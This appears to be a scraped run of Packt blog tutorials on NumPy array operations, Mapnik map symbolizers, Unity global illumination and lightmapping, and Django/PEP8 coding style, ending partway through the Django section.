The names are self-explanatory: np.std(), np.mean(), np.median(), and np.cumsum(). In [309]: np.random.seed(10)          ar=np.random.randint(0,10, size=(4,5));ar Out[309]: array([[9, 4, 0, 1, 9],                  [0, 1, 8, 9, 0],                  [8, 6, 4, 3, 0],                  [4, 6, 8, 1, 8]]) In [310]: ar.mean() Out[310]: 4.4500000000000002   In [311]: ar.std() Out[311]: 3.4274626183227732   In [312]: ar.var(axis=0) # across rows Out[312]: array([ 12.6875,   4.1875, 11.   , 10.75 , 18.1875])   In [313]: ar.cumsum() Out[313]: array([ 9, 13, 13, 14, 23, 23, 24, 32, 41, 41, 49, 55,                  59, 62, 62, 66, 72, 80, 81, 89]) Logical operators Logical operators can be used for array comparison/checking. They are as follows: np.all(): This is used for element-wise and all of the elements np.any(): This is used for element-wise or all of the elements Generate a random 4 × 4 array of ints and check if any element is divisible by 7 and if all elements are less than 11: In [320]: np.random.seed(100)          ar=np.random.randint(1,10, size=(4,4));ar Out[320]: array([[9, 9, 4, 8],                  [8, 1, 5, 3],                  [6, 3, 3, 3],                  [2, 1, 9, 5]])   In [318]: np.any((ar%7)==0) Out[318]: False   In [319]: np.all(ar<11) Out[319]: True Broadcasting In broadcasting, we make use of NumPy's ability to combine arrays that don't have the same exact shape. Here is an example: In [357]: ar=np.ones([3,2]); ar Out[357]: array([[ 1., 1.],                  [ 1., 1.],                  [ 1., 1.]])   In [358]: ar2=np.array([2,3]); ar2 Out[358]: array([2, 3])   In [359]: ar+ar2 Out[359]: array([[ 3., 4.],                  [ 3., 4.],                  [ 3., 4.]]) Thus, we can see that ar2 is broadcasted across the rows of ar by adding it to each row of ar producing the preceding result. Here is another example, showing that broadcasting works across dimensions: In [369]: ar=np.array([[23,24,25]]); ar Out[369]: array([[23, 24, 25]]) In [368]: ar.T Out[368]: array([[23],                  [24],                  [25]]) In [370]: ar.T+ar Out[370]: array([[46, 47, 48],                  [47, 48, 49],                  [48, 49, 50]]) Here, both row and column arrays were broadcasted and we ended up with a 3 × 3 array. Array shape manipulation There are a number of steps for the shape manipulation of arrays. Flattening a multi-dimensional array The np.ravel() function allows you to flatten a multi-dimensional array as follows: In [385]: ar=np.array([np.arange(1,6), np.arange(10,15)]); ar Out[385]: array([[ 1, 2, 3, 4, 5],                  [10, 11, 12, 13, 14]])   In [386]: ar.ravel() Out[386]: array([ 1, 2, 3, 4, 5, 10, 11, 12, 13, 14])   In [387]: ar.T.ravel() Out[387]: array([ 1, 10, 2, 11, 3, 12, 4, 13, 5, 14]) You can also use np.flatten, which does the same thing, except that it returns a copy while np.ravel returns a view. Reshaping The reshape function can be used to change the shape of or unflatten an array: In [389]: ar=np.arange(1,16);ar Out[389]: array([ 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) In [390]: ar.reshape(3,5) Out[390]: array([[ 1, 2, 3, 4, 5],                  [ 6, 7, 8, 9, 10],                 [11, 12, 13, 14, 15]]) The np.reshape function returns a view of the data, meaning that the underlying array remains unchanged. In special cases, however, the shape cannot be changed without the data being copied. For more details on this, see the documentation at http://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html. 
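To see the view-versus-copy difference in practice, the short sketch below (our own illustration) modifies the result of ravel() and of the ndarray method flatten() mentioned above, and checks whether the source array changes:
import numpy as np

ar = np.arange(6).reshape(2, 3)
rav = ar.ravel()       # a view onto ar's data (for a contiguous array)
rav[0] = 99
print(ar[0, 0])        # 99 - the original array is modified through the view

ar = np.arange(6).reshape(2, 3)
flat = ar.flatten()    # always a copy
flat[0] = 99
print(ar[0, 0])        # 0 - the original array is untouched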
Resizing There are two resize operators, numpy.ndarray.resize, which is an ndarray operator that resizes in place, and numpy.resize, which returns a new array with the specified shape. Here, we illustrate the numpy.ndarray.resize function: In [408]: ar=np.arange(5); ar.resize((8,));ar Out[408]: array([0, 1, 2, 3, 4, 0, 0, 0]) Note that this function only works if there are no other references to this array; else, ValueError results: In [34]: ar=np.arange(5);          ar Out[34]: array([0, 1, 2, 3, 4]) In [35]: ar2=ar In [36]: ar.resize((8,)); --------------------------------------------------------------------------- ValueError                                Traceback (most recent call last) <ipython-input-36-394f7795e2d1> in <module>() ----> 1 ar.resize((8,));   ValueError: cannot resize an array that references or is referenced by another array in this way. Use the resize function The way around this is to use the numpy.resize function instead: In [38]: np.resize(ar,(8,)) Out[38]: array([0, 1, 2, 3, 4, 0, 1, 2]) Adding a dimension The np.newaxis function adds an additional dimension to an array: In [377]: ar=np.array([14,15,16]); ar.shape Out[377]: (3,) In [378]: ar Out[378]: array([14, 15, 16]) In [379]: ar=ar[:, np.newaxis]; ar.shape Out[379]: (3, 1) In [380]: ar Out[380]: array([[14],                  [15],                  [16]]) Array sorting Arrays can be sorted in various ways. Sort the array along an axis; first, let's discuss this along the y-axis: In [43]: ar=np.array([[3,2],[10,-1]])          ar Out[43]: array([[ 3, 2],                [10, -1]]) In [44]: ar.sort(axis=1)          ar Out[44]: array([[ 2, 3],                [-1, 10]]) Here, we will explain the sorting along the x-axis: In [45]: ar=np.array([[3,2],[10,-1]])          ar Out[45]: array([[ 3, 2],                [10, -1]]) In [46]: ar.sort(axis=0)          ar Out[46]: array([[ 3, -1],                [10, 2]]) Sorting by in-place (np.array.sort) and out-of-place (np.sort) functions. Other operations that are available for array sorting include the following: np.min(): It returns the minimum element in the array np.max(): It returns the maximum element in the array np.std(): It returns the standard deviation of the elements in the array np.var(): It returns the variance of elements in the array np.argmin(): It indices of minimum np.argmax(): It indices of maximum np.all(): It returns element-wise and all of the elements np.any(): It returns element-wise or all of the elements Summary In this article we discussed how numpy.ndarray is the bedrock data structure on which the pandas data structures are based. The pandas data structures at their heart consist of NumPy ndarray of data and an array or arrays of labels. There are three main data structures in pandas: Series, DataFrame, and Panel. The pandas data structures are much easier to use and more user-friendly than Numpy ndarrays, since they provide row indexes and column indexes in the case of DataFrame and Panel. The DataFrame object is the most popular and widely used object in pandas. Resources for Article: Further resources on this subject: Machine Learning [article] Financial Derivative – Options [article] Introducing Interactive Plotting [article]

Symbolizers

Packt
18 Jun 2015
8 min read
In this article by Erik Westra, author of the book, Python Geospatial Analysis Essentials, we will see that symbolizers do the actual work of drawing a feature onto the map. Multiple symbolizers are often used to draw a single feature. There are many different types of symbolizers available within Mapnik, and many of the symbolizers have complex options associated with them. Rather than exhaustively listing all the symbolizers and their various options, we will instead just look at some of the more common types of symbolizers and how they can be used. (For more resources related to this topic, see here.) PointSymbolizer The PointSymbolizer class is used to draw an image centered over a Point geometry. By default, each point is displayed as a 4 x 4 pixel black square: To use a different image, you have to create a mapnik.PathExpression object to represent the path to the desired image file, and then pass that to the PointSymbolizer object when you instantiate it: path = mapnik.PathExpression("/path/to/image.png") point_symbol = PointSymbolizer(path) Note that PointSymbolizer draws the image centered on the desired point. To use a drop-pin image as shown in the preceding example, you will need to add extra transparent whitespace so that the tip of the pin is in the middle of the image, like this: You can control the opacity of the drawn image by setting the symbolizer's opacity attribute. You can also control whether labels will be drawn on top of the image by setting the allow_overlap attribute to True. Finally, you can apply an SVG transformation to the image by setting the transform attribute to a string containing a standard SVG transformation expression, for example point_symbol.transform = "rotate(45)". Documentation for the PointSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/PointSymbolizer. LineSymbolizer A mapnik.LineSymbolizer is used to draw LineString geometries and the outlines of Polygon geometries. When you create a new LineSymbolizer, you would typically configure it using two parameters: the color to use to draw the line as a mapnik.Color object, and the width of the line, measured in pixels. For example: line_symbol = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5) Notice that you can use fractional line widths; because Mapnik uses anti-aliasing, a line narrower than 1 pixel will often look better than a line with an integer width if you are drawing many lines close together. In addition to the color and the width, you can also make the line semi-transparent by setting the opacity attribute. This should be set to a number between 0.0 and 1.0, where 0.0 means the line will be completely transparent and 1.0 means the line will be completely opaque. You can also use the stroke attribute to get access to (or replace) the stroke object used by the line symbolizer. The stroke object, an instance of mapnik.Stroke, can be used for more complicated visual effects. For example, you can create a dashed line effect by calling the stroke's add_dash() method: line_symbol.stroke.add_dash(5, 7) Both numbers are measured in pixels; the first number is the length of the dash segment, while the second is the length of the gap between dashes. Note that you can create alternating dash patterns by calling add_dash() more than once. 
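As a small sketch of how these stroke options combine (the color, width, and dash lengths here are arbitrary values of our own choosing, not taken from the book), a semi-transparent dashed line could be set up as follows:
import mapnik

# A thin, semi-transparent grey line drawn with a repeating dash-dot pattern
road_symbol = mapnik.LineSymbolizer(mapnik.Color("#808080"), 1.5)
road_symbol.opacity = 0.7
road_symbol.stroke.add_dash(8, 4)  # 8-pixel dashes separated by 4-pixel gaps
road_symbol.stroke.add_dash(2, 4)  # alternating with 2-pixel dashes and 4-pixel gaps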
You can also set the stroke's line_cap attribute to control how the ends of the line should be drawn, and the stroke's line_join attribute to control how the joins between the individual line segments are drawn whenever the LineString changes direction. The line_cap attribute can be set to one of the following values:
mapnik.line_cap.BUTT_CAP
mapnik.line_cap.ROUND_CAP
mapnik.line_cap.SQUARE_CAP
The line_join attribute can be set to one of the following:
mapnik.line_join.MITER_JOIN
mapnik.line_join.ROUND_JOIN
mapnik.line_join.BEVEL_JOIN
Documentation for the LineSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/LineSymbolizer.
PolygonSymbolizer
The mapnik.PolygonSymbolizer class is used to fill the interior of a Polygon geometry with a given color. When you create a new PolygonSymbolizer, you would typically pass it a single parameter: the mapnik.Color object to use to fill the polygon. You can also change the opacity of the symbolizer by setting the fill_opacity attribute, for example:
fill_symbol.fill_opacity = 0.8
Once again, the opacity is measured from 0.0 (completely transparent) to 1.0 (completely opaque). There is one other PolygonSymbolizer attribute which you might find useful: gamma. The gamma value can be set to a number between 0.0 and 1.0, and it controls the amount of anti-aliasing used to draw the edge of the polygon; with the default gamma value of 1.0, the edges of the polygon will be fully anti-aliased. While this is usually a good thing, if you try to draw adjacent polygons with the same color, the anti-aliasing will cause the edges of the polygons to remain visible rather than combining them into a single larger area. By turning down the gamma slightly (for example, fill_symbol.gamma = 0.6), the edges between adjacent polygons will disappear. Documentation for the PolygonSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/PolygonSymbolizer.
TextSymbolizer
The TextSymbolizer class is used to draw textual labels onto a map. This type of symbolizer can be used for Point, LineString, and Polygon geometries. The following example shows how a TextSymbolizer can be used:
text_symbol = mapnik.TextSymbolizer(mapnik.Expression("[label]"), "DejaVu Sans Book", 10, mapnik.Color("black"))
As you can see, four parameters are typically passed to the TextSymbolizer's initializer:
A mapnik.Expression object defining the text to be displayed. In this case, the text to be displayed will come from the label attribute in the datasource.
The name of the font to use for drawing the text. To see what fonts are available, type the following into the Python command line:
import mapnik
for font in mapnik.FontEngine.face_names():
    print font
The font size, measured in pixels.
The color to use to draw the text.
By default, the text will be drawn in the center of the geometry. This positioning of the label is called point placement. The TextSymbolizer allows you to change this to use what is called line placement, where the label will be drawn along the lines:
text_symbol.label_placement = mapnik.label_placement.LINE_PLACEMENT
This causes the label to be drawn along the length of a LineString geometry, or along the perimeter of a Polygon. The text won't be drawn at all for a Point geometry, since there are no lines within a point.
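Putting the pieces together, a label configured for line placement might look like the following minimal sketch; the "[name]" attribute is an assumed field in the datasource, and the font and size simply repeat the values used above:
import mapnik

# Label each feature with its "name" attribute, drawn along the geometry
name_label = mapnik.TextSymbolizer(mapnik.Expression("[name]"),
                                   "DejaVu Sans Book", 10,
                                   mapnik.Color("black"))
name_label.label_placement = mapnik.label_placement.LINE_PLACEMENT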
The TextSymbolizer will normally just draw the label once, but you can tell the symbolizer to repeat the label if you wish by specifying a pixel gap to use between each label: text_symbol.label_spacing = 30 By default, Mapnik is smart enough to stop labels from overlapping each other. If possible, it moves the label slightly to avoid an overlap, and then hides the label completely if it would still overlap. For example: You can change this by setting the allow_overlap attribute: text_symbol.allow_overlap = True Finally, you can set a halo effect to draw a lighter-colored border around the text so that it is visible even against a dark background. For example, text_symbol.halo_fill = mapnik.Color("white") text_symbol.halo_radius = 1 There are many more labeling options, all of which are described at length in the documentation for the TextSymbolizer class. This can be found at https://github.com/mapnik/mapnik/wiki/TextSymbolizer. RasterSymbolizer The RasterSymbolizer class is used to draw raster-format data onto a map. This type of symbolizer is typically used in conjunction with a Raster or GDAL datasource. To create a new raster symbolizer, you instantiate a new mapnik.RasterSymbolizer object: raster_symbol = mapnik.RasterSymbolizer() The raster symbolizer will automatically draw any raster-format data provided by the map layer's datasource. This is often used to draw a basemap onto which the vector data is to be displayed; for example: While there are some advanced options to control the way the raster data is displayed, in most cases, the only option you might be interested in is the opacity attribute. As usual, this sets the opacity for the displayed image, allowing you to layer semi-transparent raster images one on top of the other. Documentation for the RasterSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/RasterSymbolizer. Summary In this article, we covered different types of symbolizers, which are available in the Mapnik library. We also examined that symbolizers which can be used to display spatial features, how the visible extent is used to control the portion of the map to be displayed, and how to render a map as an image file. Resources for Article: Further resources on this subject: Python functions – Avoid repeating code [article] Preparing to Build Your Own GIS Application [article] Server Logs [article]

Global Illumination

Packt
17 Jun 2015
16 min read
In this article by Volodymyr Gerasimov, the author of the book, Building Levels in Unity, you will see two types of lighting that you need to take into account if you want to create well lit levels—direct and indirect. Direct light is the one that is coming directly from the source. Indirect light is created by light bouncing off the affected area at a certain angle with variable intensity. In the real world, the number of bounces is infinite and that is the reason why we can see dark areas that don't have light shining directly at them. In computer software, we don't yet have the infinite computing power at our disposal to be able to use different tricks to simulate the realistic lighting at runtime. The process that simulates indirect lighting, light bouncing, reflections, and color bleeding is known as Global Illumination (GI). Unity 5 is powered by one of the industry's leading technologies for handling indirect lighting (radiosity) in the gaming industry, called Enlighten by Geomerics. Games such as Battlefield 3-4, Medal of Honor: Warfighter, Need for Speed the Run and Dragon Age: Inquisition are excellent examples of what this technology is capable of, and now all of that power is at your fingertips completely for free! Now, it's only appropriate to learn how to tame this new beast. (For more resources related to this topic, see here.) Preparing the environment Realtime realistic lighting is just not feasible at our level of computing power, which forces us into inventing tricks to simulate it as close as possible, but just like with any trick, there are certain conditions that need to be met in order for it to work properly and keep viewer's eyes from exposing our clever deception. To demonstrate how to work with these limitations, we are going to construct a simple light set up for the small interior scene and talk about solutions to the problems as we go. For example, we will use the LightmappingInterior scene that can be found in the Chapter 7 folder in the Project window. It's a very simple interior and should take us no time to set up. The first step is to place the lights. We will be required to create two lights: a Directional to imitate the moonlight coming from the crack in the dome and a Point light for the fire burning in the goblet, on the ceiling.   Tune the light's Intensity, Range (in Point light's case), and Color to your liking. So far so good! We can see the direct lighting coming from the moonlight, but there is no trace of indirect lighting. Why is this happening? Should GI be enabled somehow for it to work? As a matter of fact, it does and here comes the first limitation of Global Illumination—it only works on GameObjects that are marked as Static. Static versus dynamic objects Unity objects can be of one of the two categories: static or dynamic. Differentiation is very simple: static objects don't move, they stay still where they are at all times, they neither play any animations nor engage in any kind of interactions. The rest of the objects are dynamic. By default, all objects in Unity are dynamic and can only be converted into static by checking the Static checkbox in the Inspector window.   See it for yourself. Try to mark an object as static in Unity and attempt to move it around in the Play mode. Does it work? 
Global Illumination will only work with static objects; this means, before we go into the Play mode right above it, we need to be 100 percent sure that the objects that will cast and receive indirect lights will not stop doing that from their designated positions. However, why is that you may ask, isn't the whole purpose of Realtime GI to calculate indirect lighting in runtime? The answer to that would be yes, but only to an extent. The technology behind this is called Precomputed Realtime GI, according to Unity developers it precomputes all possible bounces that the light can make and encodes them to be used in realtime; so it essentially tells us that it's going to take a static object, a light and answer a question: "If this light is going to travel around, how is it going to bounce from the affected surface of the static object from every possible angle?"   During runtime, lights are using this encoded data as instructions on how the light should bounce instead of calculating it every frame. Having static objects can be beneficial in many other ways, such as pathfinding, but that's a story for another time. To test this theory, let's mark objects in the scene as Static, meaning they will not move (and can't be forced to move) by physics, code or even transformation tools (the latter is only true during the Play mode). To do that, simply select Pillar, Dome, WaterProNighttime, and Goblet GameObjects in the Hierarchy window and check the Static checkbox at the top-right corner of the Inspector window. Doing that will cause Unity to recalculate the light and encode bouncing information. Once the process has finished (it should take no time at all), you can hit the Play button and move the light around. Notice that bounce lighting is changing as well without any performance overhead. Fixing the light coming from the crack The moonlight inside the dome should be coming from the crack on its surface, however, if you rotate the directional light around, you'll notice that it simply ignores concrete walls and freely shines through. Naturally, that is incorrect behavior and we can't have that stay. We can clearly see through the dome ourselves from the outside as a result of one-sided normals. Earlier, the solution was to duplicate the faces and invert the normals; however, in this case, we actually don't mind seeing through the walls and only want to fix the lighting issue. To fix this, we need to go to the Mesh Render component of the Dome GameObject and select the Two Sided option from the drop-down menu of the Cast Shadows parameter.   This will ignore backface culling and allow us to cast shadows from both sides of the mesh, thus fixing the problem. In order to cast shadows, make sure that your directional light has Shadow Type parameter set to either Hard Shadows or Soft Shadows.   Emission materials Another way to light up the level is to utilize materials with Emission maps. Pillar_EmissionMaterial applied to the Pillar GameObject already has an Emission map assigned to it, all that is left is to crank up the parameter next to it, to a number which will give it a noticeable effect (let's say 3). Unfortunately, emissive materials are not lights, and precomputed GI will not be able to update indirect light bounce created by the emissive material. As a result, changing material in the Play mode will not cause the update. Changes done to materials in the Play mode will be preserved in the Editor. Shadows An important byproduct of lighting is shadows cast by affected objects. 
No surprises here! Unity allows us to cast shadows by both dynamic and static objects and have different results based on render settings. By default, all lights in Unity have shadows disabled. In order to enable shadows for a particular light, we need to modify the Shadow Type parameter to be either Hard Shadows or Soft Shadows in the Inspector window.   Enabling shadows will grant you access to three parameters: Strength: This is the darkness of shadows, from 0 to 1. Resolution: This controls the resolution of the shadows. This parameter can utilize the value set in the Use Quality Settings or be selected individually from the drop down menu. Bias and Normal Bias – this is the shadow offset. These parameters are used to prevent an artifact known as Shadow Acne (pixelated shadows in lit areas); however, setting them too high can cause another artifact known as Peter Panning (disconnected shadow). Default values usually help us to avoid both issues. Unity is using a technique known as Shadow Mapping, which determines the objects that will be lit by assuming the light's perspective—every object that light sees directly, is lit; every object that isn't seen should be in the shadow. After rendering the light's perspective, Unity stores the depth of each surface into a shadow map. In the cases where the shadow map resolution is low, this can cause some pixels to appear shaded when they shouldn't be (Shadow Acne) or not have a shadow where it's supposed to be (Peter Panning), if the offset is too high. Unity allows you to control the objects that should receive or cast shadows by changing the parameters Cast Shadows and Receive Shadows in the Rendering Mesh component of a GameObject. Lightmapping Every year, more and more games are being released with real-time rendering solutions that allow for more realistic-looking environments at the price of ever-growing computing power of modern PCs and consoles. However, due to the limiting hardware capabilities of mobile platforms, it is still a long time before we are ready to part ways with cheap and affordable techniques such as lightmapping. Lightmapping is a technology for precomputing brightness of surfaces, also known as baking, and storing it in a separate texture—a lightmap. In order to see lighting in the area, we need to be able to calculate it at least 30 times per second (or more, based on fps requirements). This is not very cheap; however, with lightmapping we can calculate lighting once and then apply it as a texture. This technology is suitable for static objects that artists know will never be moved; in a nutshell, this process involves creating a scene, setting up the lighting rig and clicking Bake to get great lighting with minimum performance issues during runtime. To demonstrate the lightmapping process, we will take the scene and try to bake it using lightmapping. Static versus dynamic lights We've just talked about a way to guarantee that the GameObjects will not move. But what about lights? Hitting the Static checkbox for lights will not achieve much (unless you simply want to completely avoid the possibility of accidentally moving them). The problem at hand is that light, being a component of an object, has a separate set of controls allowing them to be manipulated even if the holder is set to static. For that purpose, each light has a parameter that allows us to specify the role of individual light and its contribution to the baking process, this parameter is called Baking. 
There are three options available for it: Realtime: This option will exclude this particular light from the baking process. It is totally fine to use real-time lighting, precomputed GI will make sure that modern computers and consoles are able to handle them quite smoothly. However, they might cause an issue if you are developing for the mobile platforms which will require every bit of optimization to be able to run with a stable frame rate. There are ways to fake real-time lighting with much cheaper options,. The only thing you should consider is that the number of realtime lights should be kept at a minimum if you are going for maximum optimization. Realtime will allow lights to affect static and dynamic objects. Baked: This option will include this light into the baking process. However, there is a catch: only static objects will receive light from it. This is self-explanatory—if we want dynamic objects to receive lighting, we need to calculate it every time the position of an object changes, which is what Realtime lighting does. Baked lights are cheap, calculated once we have stored all lighting information on a hard drive and using it from there, no further recalculation is required during runtime. It is mostly used on small situational lights that won't have a significant effect on dynamic objects. Mixed: This one is a combination of the previous two options. It bakes the lights into the static objects and affects the dynamic objects as they pass by. Think of the street lights: you want the passing cars to be affected; however, you have no need to calculate the lighting for the static environment in realtime. Naturally, we can't have dynamic objects move around the level unlit, no matter how much we'd like to save on computing power. Mixed will allow us to have the benefit of the baked lighting on the static objects as well as affect the dynamic objects at runtime. The first step that we are going to take is changing the Baking parameter of our lights from Realtime to Baked and enabling Soft Shadows:   You shouldn't notice any significant difference, except for the extra shadows appearing. The final result isn't too different from the real-time lighting. Its performance is much better, but lacks the support of dynamic objects. Dynamic shadows versus static shadows One of the things that get people confused when starting to work with shadows in Unity is how they are being cast by static and dynamic objects with different Baking settings on the light source. This is one of those things that you simply need to memorize and keep in mind when planning the lighting in the scene. We are going to explore how different Baking options affect the shadow casting between different combinations of static and dynamic objects: As you can see, real-time lighting handles everything pretty well; all the objects are casting shadows onto each other and everything works as intended. There is even color bleeding happening between two static objects on the right. With Baked lighting the result isn't that inspiring. Let's break it down. Dynamic objects are not lit. If the object is subject to change at runtime, we can't preemptively bake it into the lightmap; therefore, lights that are set to Baked will simply ignore them. Shadows are only cast by static objects onto static objects. This correlates to the previous statement that if we aren't sure that the object is going to change we can't safely bake its shadows into the shadow map. 
With Mixed we get a similar result as with real-time lighting, except for one instance: dynamic objects are not casting shadows onto static objects, but the reverse does work: static objects are casting shadows onto the dynamic objects just fine, so what's the catch? Each object gets individual treatment from the Mixed light: those that are static are treated as if they are lit by the Baked light and dynamic are lit in realtime. In other words, when we are casting a shadow onto a dynamic object, it is calculated in realtime, while when we are casting shadow onto the static object, it is baked and we can't bake a shadow that is cast by the object that is subject to change. This was never the case with real-time lighting, since we were calculating the shadows at realtime, regardless of what they were cast by or cast onto. And again, this is just one scenario that you need to memorize. Lighting options The Lighting window has three tabs: Object, Scene, and Lightmap. For now we will focus on the first one. The main content of an Object tab is information on objects that are currently selected. This allows us to get quick access to a list of controls, to better tweak selected objects for lightmapping and GI. You can switch between object types with the help of Scene Filter at the top; this is a shortcut to filtering objects in the Hierarchy window (this will not filter the selected GameObjects, but everything in the Hierarchy window). All GameObjects need to be set to Static in order to be affected by the lightmapping process; this is why the Lightmap Static checkbox is the first in the list for Mesh Renderers. If you haven't set the object to static in the Inspector window, checking the Lightmap Static box will do just that. The Scale in Lightmap parameter controls the lightmap resolution. The greater the value, the bigger the resolution given to the object's lightmap, resulting in better lighting effects and shadows. Setting the parameter to 0 will result in an object not being affected by lightmapping. Unless you are trying to fix lighting artifacts on the object, or going for the maximum optimization, you shouldn't touch this parameter; there is a better way to adjust the lightmap resolution for all objects in the scene; Scale in Lightmap scales in relation to global value. The rest of the parameters are very situational and quite advanced, they deal with UVs, extend the effect of GI on the GameObject, and give detailed information on the lightmap. For lights, we have a baking parameter with three options: Realtime, Baked, or Mixed. Naturally, if you want this light for lightmapping, Realtime is not an option, so you should pick Baked or Mixed. Color and Intensity are referenced from the Inspector window and can be adjusted in either place. Baked Shadows allows us to choose the shadow type that will be baked (Hard, Soft, Off). Summary Lighting is a difficult process that is deceptively easy to learn, but hard to master. In Unity, lighting isn't without its issues. Attempting to apply real-world logic to 3D rendering will result in a direct confrontation with limitations posed by imperfect simulation. In order to solve issues that may arise, one must first understand what might be causing them, in order to isolate the problem and attempt to find a solution. Alas, there are still a lot of topics left uncovered that are outside of the realm of an introduction. 
If you wish to learn more about lighting, I would point you again to the official documentation and developer blogs, where you'll find a lot of useful information, tons of theory, practical recommendations, as well as in-depth look into all light elements discussed. Resources for Article: Further resources on this subject: Learning NGUI for Unity [article] Saying Hello to Unity and Android [article] Components in Unity [article]

Code Style in Django

Packt
17 Jun 2015
16 min read
In this article written by Sanjeev Jaiswal and Ratan Kumar, authors of the book Learning Django Web Development, this article will cover all the basic topics which you would require to follow, such as coding practices for better Django web development, which IDE to use, version control, and so on. We will learn the following topics in this article: Django coding style Using IDE for Django web development Django project structure This article is based on the important fact that code is read much more often than it is written. Thus, before you actually start building your projects, we suggest that you familiarize yourself with all the standard practices adopted by the Django community for web development. Django coding style Most of Django's important practices are based on Python. Though chances are you already know them, we will still take a break and write all the documented practices so that you know these concepts even before you begin. To mainstream standard practices, Python enhancement proposals are made, and one such widely adopted standard practice for development is PEP8, the style guide for Python code–the best way to style the Python code authored by Guido van Rossum. The documentation says, "PEP8 deals with semantics and conventions associated with Python docstrings." For further reading, please visit http://legacy.python.org/dev/peps/pep-0008/. Understanding indentation in Python When you are writing Python code, indentation plays a very important role. It acts as a block like in other languages, such as C or Perl. But it's always a matter of discussion amongst programmers whether we should use tabs or spaces, and, if space, how many–two or four or eight. Using four spaces for indentation is better than eight, and if there are a few more nested blocks, using eight spaces for each indentation may take up more characters than can be shown in single line. But, again, this is the programmer's choice. The following is what incorrect indentation practices lead to: >>> def a(): ...   print "foo" ...     print "bar" IndentationError: unexpected indent So, which one we should use: tabs or spaces? Choose any one of them, but never mix up tabs and spaces in the same project or else it will be a nightmare for maintenance. The most popular way of indention in Python is with spaces; tabs come in second. If any code you have encountered has a mixture of tabs and spaces, you should convert it to using spaces exclusively. Doing indentation right – do we need four spaces per indentation level? There has been a lot of confusion about it, as of course, Python's syntax is all about indentation. Let's be honest: in most cases, it is. So, what is highly recommended is to use four spaces per indentation level, and if you have been following the two-space method, stop using it. There is nothing wrong with it, but when you deal with multiple third party libraries, you might end up having a spaghetti of different versions, which will ultimately become hard to debug. Now for indentation. When your code is in a continuation line, you should wrap it vertically aligned, or you can go in for a hanging indent. When you are using a hanging indent, the first line should not contain any argument and further indentation should be used to clearly distinguish it as a continuation line. A hanging indent (also known as a negative indent) is a style of indentation in which all lines are indented except for the first line of the paragraph. The preceding paragraph is the example of hanging indent. 
The following example illustrates how you should use a proper indentation method while writing the code:
bar = some_function_name(var_first, var_second,
                         var_third, var_fourth)
# Here, the indentation of the arguments keeps them grouped and clearly separate from other code.

def some_function_name(
        var_first, var_second, var_third,
        var_fourth):
    print(var_first)
# This example shows the hanging indent.
We do not encourage the following coding style, and it will not work in Python anyway:
# When vertical alignment is not used, arguments on the first line are forbidden
foo = some_function_name(var_first, var_second,
    var_third, var_fourth)

# Further indentation is required, as the indentation here does not distinguish the arguments from the body of the function.
def some_function_name(
    var_first, var_second, var_third,
    var_fourth):
    print(var_first)
Extra indentation on a continuation line is not strictly required; the following style, which adds no extra indentation, is also acceptable:
# Extra indentation is not necessary.
if (this
    and that):
    do_something()
Ideally, you should limit each line to a maximum of 79 characters. This leaves room for the + or - characters that mark lines when viewing differences under version control, and it keeps lines readable across editors.
The importance of blank lines
The importance of two blank lines and single blank lines is as follows:
Two blank lines: Two blank lines can be used to separate top-level functions and class definitions, which enhances code readability.
Single blank lines: A single blank line can be used to separate the methods inside a class, to group related functions together, and to separate logical sections of source code.
Importing a package
Importing a package is a direct implication of code reusability. Therefore, always place imports at the top of your source file, just after any module comments and docstrings, and before the module's globals and constants. Each import should usually be on a separate line. The best way to import packages is as follows:
import os
import sys
It is not advisable to import more than one package on the same line, for example:
import sys, os
You may import packages in the following fashion, although it is optional:
from django.http import Http404, HttpResponse
If your import list gets longer, you can use the following method to declare it:
from django.http import (
    Http404,
    HttpResponse,
    HttpResponsePermanentRedirect
)
Grouping imported packages
Package imports can be grouped in the following ways:
Standard library imports: Such as sys, os, subprocess, and so on.
import re
import simplejson
Related third party imports: These are usually downloaded from the Python cheese shop, that is, PyPI (using pip install). Here is an example:
from decimal import *
Local application / library-specific imports: These include the local modules of your project, such as models, views, and so on.
from models import ModelFoo
from models import ModelBar
Naming conventions in Python/Django
Every programming language and framework has its own naming convention. The naming conventions in Python and Django are more or less the same, but they are worth mentioning here.
You will need to follow these conventions when creating variable names and global variable names, and when naming classes, packages, modules, and so on. These are the common naming conventions that we should follow:

Name the variables properly: Never use single characters, for example, 'x' or 'X', as variable names. It might be okay for your throwaway Python scripts, but when you are building a web application, you must name variables properly, as this determines the readability of the whole project.

Naming of packages and modules: Lowercase and short names are recommended for modules. Underscores can be used if their use would improve readability. Python packages should also have short, all-lowercase names, although the use of underscores is discouraged. Since module names are mapped to file names (models.py, urls.py, and so on), it is important that module names be fairly short, as some file systems are case insensitive and truncate long names.

Naming a class: Class names should follow the CamelCase naming convention, and classes for internal use can have a leading underscore in their name.

Global variable names: First of all, you should avoid using global variables, but if you need them, you can prevent global variables from getting exported via __all__, or by defining them with a leading underscore (the old, conventional way).

Function names and method arguments: Names of functions should be in lowercase, with words separated by underscores. Use self as the first argument of instance methods and cls as the first argument of class methods.

Method names and instance variables: Use the function naming rules—lowercase with words separated by underscores as necessary to improve readability. Use one leading underscore only for non-public methods and instance variables.

Using an IDE for faster development

There are many options on the market when it comes to source code editors. Some people prefer full-fledged IDEs, whereas others like simple text editors. The choice is totally yours; pick whatever feels most comfortable. If you already use a certain program to work with Python source files, I suggest that you stick to it, as it will work just fine with Django. Otherwise, I can make a couple of recommendations, such as these:

SublimeText: This editor is lightweight and very powerful. It is available for all major platforms, supports syntax highlighting and code completion, and works well with Python. You can find it at http://www.sublimetext.com/

PyCharm: This, I would say, is the most intelligent code editor of all and has advanced features, such as code refactoring and code analysis, which make development cleaner. Its features for Django include template debugging (which is a winner) and quick documentation look-up, which is a great help for beginners. The community edition is free, and you can sample a 30-day trial version before buying the professional edition.

Setting up your project with the Sublime text editor

Most of the examples that we will show you in this book will be written using the Sublime text editor. In this section, we will show how to install the editor and set up a Django project in it.

Download and installation: You can download Sublime from the download tab of the site www.sublimetext.com. Click on the downloaded file to install it.

Setting up for Django: Sublime has a very extensive plug-in ecosystem, which means that once you have downloaded the editor, you can install plug-ins for adding more features to it. 
After successful installation, it will look like this:

